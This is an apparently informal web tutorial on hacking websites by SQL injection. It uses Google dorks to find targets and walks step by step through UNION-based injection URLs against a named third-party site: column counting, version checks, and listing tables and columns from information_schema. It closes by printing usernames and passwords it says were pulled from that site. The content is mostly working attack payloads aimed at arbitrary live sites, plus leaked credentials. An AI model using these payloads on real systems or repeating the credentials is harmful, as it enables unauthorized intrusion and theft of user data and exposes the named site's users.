okay first find a volnuerable website
to get volnerable websites
open google.com
and type one of these dorks
inurl:/index.php?id=
inurl:/news.php?id=
inurl:/page.php?id=
inurl:/view.php?id=
inurl:/item.php?id=
well there is a huge list of google dorks
you can get these from google
okay
when you type one of the google dork..thousands of sites
will be searched
now open a website and type ' at the end of url
if you get this error
then the website is vuln and you can try to hack it
oka now that you have this error
now you need to find number of columns
now remove ' and type
order by 1(syntax)
now your url will be like
www.brew-monkey.com/news.php?id=465 order by 1
if you dont get any error then increase number
www.brew-monkey.com/news.php?id=465 order by 2 (no error)
www.brew-monkey.com/news.php?id=465 order by 3 (no error)
www.brew-monkey.com/news.php?id=465 order by 4 (no error)
www.brew-monkey.com/news.php?id=465 order by 5 (no error)
www.brew-monkey.com/news.php?id=465 order by 6
ohh error came here
Unknown column '6' in 'order clause'
so you have this number of columns in this website is 5
now its time to use union all select statement
oka as we know our website has 5 columns
now wee need to find vunl columns
for that use this syntax
www.brew-monkey.com/news.php?id=465 union all select 1,2,3,4,5--
now see the pic 3
here you can clearly see some bold numbers
in this website the number is 3
that mean string column is 3
okay
now lets check the MySql version of the website
to check this you need to replace your url with
www.brew-monkey.com/news.php
?id=465 union all select 1,2,@@version,4,5--
oka now see the pic 4
you can clearly see in this pic that
where the column number was written, now there is some changing and that is the
database version
okay if the number is greater than or = 5 then its good
because its easy to crack
if its below then you the sql injection is blind
(it does not mean that you cant crack the db but we have to guess
the table names and all )
okay
so now as we have checked this
now we gonna crack its db
oka
lets find the tables of this database
oka now replace the url with
www.brew-monkey.com/news.php?id=465 union all select 1,2,table_name,4,5 from information_schema.tables where table_schema=database()
if it does not work then use
www.brew-monkey.com/news.php?id=465 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()
wow see the pic 5 below
we have all its table now
now we have to check its tables and find some table with sensitive information
it may be admin , users , usergroups etc
okay so here im trying to crack this table
cpg131_users
oka so now we need to replace our url with
www.brew-monkey.com/news.php?id=465 union all select 1,2,column_name,4,5 from information_schema.columns where table_name=cpg131_users
install hackbar (adds on of firefox) as i have
now click on sql >mysql>Mysqlchar
and type the table name
then you wil get its value
now the decimal value of cpg131_users is (99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)
oka copy it and replace the url with
www.brew-monkey.com/news.php?id=465 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=char(99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)
well its working
see pic 6
now we need to fetch data of columns
now in this website
the information is in columns
user_name
user_password
oka to fetch these
replace the url with
http://www.brew-monkey.com/news.php?...cpg131_users--
wow
we have done it guyz..
there are 3 users in this database
brewmonkey_admin:beavis01
chris:ob5c3n3,mara:0re0gasm
Kevin:kevinspassword
i hope u like this tutorial.
well this tutorial took my 1 hour to create
and if u like it , it will take only 1 second to press the thanks button
0 comments:
Post a Comment